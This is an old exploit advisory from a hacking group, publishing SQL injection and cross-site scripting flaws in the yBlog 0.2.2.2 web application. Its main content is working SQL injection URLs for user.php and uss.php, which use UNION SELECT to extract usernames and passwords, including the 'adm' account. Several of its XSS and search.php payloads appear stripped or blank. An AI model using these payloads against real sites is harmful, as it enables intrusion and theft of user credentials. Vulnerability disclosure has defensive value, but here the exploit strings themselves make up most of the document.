|
|
_____ _ _ _____ _____ _____ _____ =0D
/ ___| |_| | _ \| _ | _ |_ _| =0D
| (___| _ | [_)_/| (_) | (_) | | | =0D
\_____|_| |_|_| |_||_____|_____| |_| =0D
C. H. R. O. O. T. SECURITY GROUP=0D
- -- ----- --- -- -- ---- --- -- - =0D
http://www.chroot.org=0D
=0D
_ _ _ _____ ____ ____ __ _ =0D
Hacks In Taiwan | |_| | |_ _| __| | \| |=0D
Conference 2008 | _ | | | | | (__| () | |=0D
|_| |_|_| |_| \____|____|_|\__|=0D
http://www.hitcon.org=0D
=0D
=0D
Title =======:: yBlog 0.2.2.2 Multiple Remote Vulnerabilities=0D
=0D
Author ======:: unohope [at] chroot [dot] org=0D
=0D
IRC =========:: irc.chroot.org #chroot=0D
=0D
ScriptName ==:: yBlog=0D
=0D
Download ====:: http://nchc.dl.sourceforge.net/sourceforge/y-blog/yblog-0.2.2.2.tar.gz=0D
=0D
Mirror ======:: http://www.badongo.com/file/9705849=0D
=0D
______________________=0D
[SQL Injection]=0D
=0D
- {search.php} -=0D
=0D
=0D
=0D
=0D
=0D
- {user.php} -=0D
=0D
http://localhost/yblog/user.php?n=-99'+union+select+0,1,2,3,usuario,password,6,7,8,9,10,11,12,13,14,15,16+from+usuarios/*=0D
=0D
- {uss.php} -=0D
=0D
http://localhost/yblog/uss.php?action=2&done=1&n=-99'+union+select+0,1,2,usuario,password,5,6,7,8,9,10,11,12,13,14,15,16+from+usuarios+where+usuario='adm'/*=0D
=0D
______________________=0D
[Cross-Site Scripting]=0D
=0D
- {search.php} -=0D
=0D
=0D
=0D
- {user.php} -=0D
=0D
http://localhost/yblog/user.php?n==0D
=0D
- {uss.php} - =0D
=0D
http://localhost/yblog/uss.php?action=2&done=1&n==0D
=0D
______=0D
[NOTE]=0D
=0D
!! This is just for educational purposes, DO NOT use for illegal. !!=0D